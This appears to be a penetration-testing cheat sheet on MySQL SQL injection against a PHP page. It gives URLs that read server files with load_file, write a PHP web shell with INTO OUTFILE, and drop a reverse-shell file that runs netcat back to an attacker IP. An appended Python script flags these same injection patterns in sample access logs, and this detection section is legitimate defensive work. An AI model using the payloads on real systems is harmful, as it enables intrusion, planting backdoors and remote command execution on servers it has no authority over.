SQL Shells
Last updated
Reading files from the server (mysql)
load_file function
http://<IP>/comment.php?id=735 union select 1,2,3,4,load_file('C:/windows/system32/drivers/etc/hosts'),6
Code Injection (mysql)
into OUTFILE
http://<IP>/comment.php?id=735 union all select 1,2,3,4,"<?php echo shell_exec($_GET['cmd']);?>",6 into OUTFILE 'c:/xampp/htdocs/backdoor.php'
Then browse to backdoor.php and run a command by appending ?cmd=<cmd> to the URL.
Spawning a shell (mysql)
First, start a netcat listener on your attacking system; in this example we will listen on port 9001.
Next, inject into the GET request so that the server connects back to our attacking system on port 9001 via netcat:
http://<IP>/comment.php?id=735 union select 1,2,3,4,"<?php exec('nc.exe 10.11.0.76 9001 -e cmd.exe'); ?>",6 into OUTFILE 'c:/xampp/htdocs/reverse_shell.php'
Browse to our file and then check back with netcat for the connection.
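Added detection example (not part of the original notes): a Python scan over constructed web-server access-log lines that flags the load_file() and INTO OUTFILE injection shapes described above, URL-decoding each request target first so that encoded payloads are still inspected. The log lines, rule names and function names are constructed for this example; on MySQL, restricting secure_file_priv limits what these functions can read or write in the first place.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample access-log lines (not from the original page). The first two
# mirror the file-read and file-write injections above; the last two are benign.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /comment.php?id=735%20union%20select%201,2,3,4,load_file('C:/windows/system32/drivers/etc/hosts'),6 HTTP/1.1" 200 512
10.0.0.5 - - [01/Jan/2024:10:00:02 +0000] "GET /comment.php?id=735%20union%20all%20select%201,2,3,4,%22%3C?php%20echo%20shell_exec($_GET['cmd']);?%3E%22,6%20into%20OUTFILE%20'c:/xampp/htdocs/backdoor.php' HTTP/1.1" 200 512
10.0.0.9 - - [01/Jan/2024:10:00:03 +0000] "GET /comment.php?id=735 HTTP/1.1" 200 2048
10.0.0.9 - - [01/Jan/2024:10:00:04 +0000] "GET /search.php?q=select+a+file HTTP/1.1" 200 1024
"""

# Detection rules for the MySQL file-access primitives this page describes.
RULES = {
    "mysql_file_read": re.compile(r"\bload_file\s*\(", re.I),
    "mysql_file_write": re.compile(r"\binto\s+(?:out|dump)file\b", re.I),
    "union_select": re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I),
    "php_tag_in_query": re.compile(r"<\?php", re.I),
}

# Common/combined log format: client, identity, user, timestamp, request line.
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*"'
)


def decode_target(target: str, max_rounds: int = 3) -> str:
    """URL-decode repeatedly so double-encoded payloads are inspected as well."""
    for _ in range(max_rounds):
        decoded = unquote_plus(target)
        if decoded == target:
            break
        target = decoded
    return target


def scan_log(text: str) -> list[dict]:
    """Return one finding per request whose decoded target matches any rule."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in the expected log format
        target = decode_target(m.group("target"))
        hits = [name for name, rx in RULES.items() if rx.search(target)]
        if hits:
            findings.append({"client": m.group("client"), "ts": m.group("ts"),
                             "target": target, "rules": hits})
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f["ts"], f["client"], f["rules"], f["target"])
```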